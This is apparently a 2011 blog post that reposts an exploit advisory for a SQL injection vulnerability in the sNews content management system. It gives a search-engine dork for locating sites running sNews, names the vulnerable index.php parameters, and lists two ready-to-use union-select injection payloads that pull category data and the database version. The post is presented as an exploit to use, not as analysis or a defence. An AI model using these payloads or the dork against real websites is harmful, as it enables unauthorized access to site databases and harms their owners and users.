Monday, April 4, 2011


sNews (index.php) SQL Injection Vulnerability

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
Dork:
"Powered by sNews"

===================================================

[+] Vulnerable File :

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :

-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

====================================================

Referensi : Inj3ct0r.com

No comments:

Template by : mhiman@ hacker-newbie.org